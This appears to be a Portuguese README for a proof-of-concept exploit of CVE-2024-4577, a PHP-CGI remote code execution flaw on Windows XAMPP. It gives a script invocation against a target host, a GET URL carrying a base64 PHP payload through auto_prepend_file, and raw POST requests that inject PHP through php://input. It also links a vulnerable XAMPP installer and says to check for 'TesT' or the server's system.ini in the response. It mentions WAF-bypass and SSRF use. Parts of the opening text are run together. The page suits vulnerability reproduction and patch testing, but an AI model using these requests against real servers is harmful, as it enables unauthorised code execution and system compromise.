
[Reprodução de Vulnerabilidade] O primeiro exploit global do CVE-2024-4577, uma vulnerabilidade RCE PHP-CGI que utiliza o ambiente padrão PHP (XAMPP).
cgi.force_redirect + REDIRECT-STATUS.data:// + requisição GET.allow_url_include, auto_prepend_file, auto_append_file. Pode incluir arquivos arbitrários e arquivos PHP.allow_url_include, auto_prepend_file, auto_append_file.| Informação | Conteúdo |
|---|---|
| Nome da Vulnerabilidade | PHP RCE |
| ID da Vulnerabilidade | CVE-2024-4577 |
| Nível de Risco | Crítica |
Pode ser usado para cenários de bypass de WAF + cenário padrão:
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
Exemplo:
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
Pode ser usado para cenários SSRF + cenário padrão:
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
Pode ser usado no cenário padrão:
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
<?php die("Te"."sT");?>
Pode ser usado no cenário padrão:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
XAMPP versão Windows 8.2.12
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
Ou escolha uma versão afetada em: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
Nenhuma modificação necessária, mantenha a configuração padrão
Use um dos EXP acima para testar
Observe se a string "TesT" ou o conteúdo do arquivo system.ini do servidor é retornado
| Tipo da Vulnerabilidade | RCE |
| Dificuldade de Exploração | Baixa |